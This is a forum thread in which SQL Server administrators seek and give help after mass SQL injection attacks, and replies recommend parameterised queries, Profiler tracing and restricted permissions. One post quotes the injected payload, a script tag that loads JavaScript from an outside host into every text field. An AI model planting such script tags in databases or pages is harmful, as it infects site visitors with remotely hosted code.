InstantForum.NET v2.9.0SQLServerCentralhttp://www.sqlservercentral.com/Forums/notifications@sqlservercentral.comTue, 18 Jun 2013 00:41:51 GMT20http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxOk, will do BUT ... the main gist of this post was [b]your[/b] mention of the "profiler"?We are trying to determine the vulnerability? Fri, 26 Oct 2012 09:48:42 GMTbritinusahttp://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxNew thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.Fri, 26 Oct 2012 09:43:52 GMTGilaMonsterhttp://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxSorry .. by all means .. I'm new here ... my bad. A new thread or somewhere you'd prefer? RobertFri, 26 Oct 2012 09:38:35 GMTbritinusahttp://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxCan you post this in a new thread please?Fri, 26 Oct 2012 09:32:13 GMTGilaMonsterhttp://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxWow, this is an old thread but still very pertinent. We are rapidly migrating to SQL 2005. But we were attacked by injection ... every vharchar field in every table replaced with similar .js crap. We restored and the world was good. But we're trying to find the vulnerability ... of the publically visible pages on the site, (only 5 or 6) all are derived with stored procs and / or our own in house brewed trap. We are told that SQL2005 and SQL2008 handle SQL injections far better. We are also about to, within a month, implement a proper SQL Server 2005 mirror. But of course mirrors will merely mirror the injection; right? I'm babbling ... but beyond stored procs and home grown filters, are there any other known hardware sotweare remedies. You refer to a [b]profiler[/b] to see commands ... where is that? Fri, 26 Oct 2012 09:26:50 GMTbritinusahttp://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxThe safest fix is probably to completely drop the replication and recreate it.Thu, 24 Jul 2008 03:31:40 GMTGilaMonsterhttp://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxHiThank you for your last reply.I resolved that problem by editing all tables and removing that script.I think it was a new injection method.This link was helpful:http://www.msblog.org/index.php?s=yphttp://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspxBut I couldn’t resolve a part of problem:There were many Binary fields in MSrepl_commands containing bad script.I deleted them because I couldn’t edit them.I will be pleased to teach “how to edit MSrepl_commands command field and alter its data?”Yours trulysaeed.Thu, 24 Jul 2008 03:29:06 GMTsaeed_edphttp://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxWhen reading this. Scroll up to the top of this page in the upper frame you will see [b]Search:[/b] type in the word "injection" (without the quotes) and then click the button labelled [b]Go[/b]. And be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQL ServerCentralThu, 03 Jul 2008 15:59:43 GMTbitbucket-25253http://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxYou need to find the application that is vulnerable to injection (you can use profiler to see the commands coming to the database)There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly acces the tables but to use stored procs.I would suggest that you drop the publication in question and recreate it.Wed, 02 Jul 2008 06:01:47 GMTGilaMonsterhttp://www.sqlservercentral.com/Forums/Topic527164-7-1.aspxPleas help me!I'm under injection attack and i don't no what can i do.This script ' script src=http://www.hdadwcd.com/b.js /script' is injected to may database (sql server 2000).It not only injected in many of databases field but also renamed my publication name to : " [b]publication name[/b] script src=http://www.hdadwcd.com/b.js /script "How can i repair it and stop this injectionHow can I edit binary fields in MSrepl_commands and delete this script from command field.Wed, 02 Jul 2008 05:03:28 GMTsaeed_edp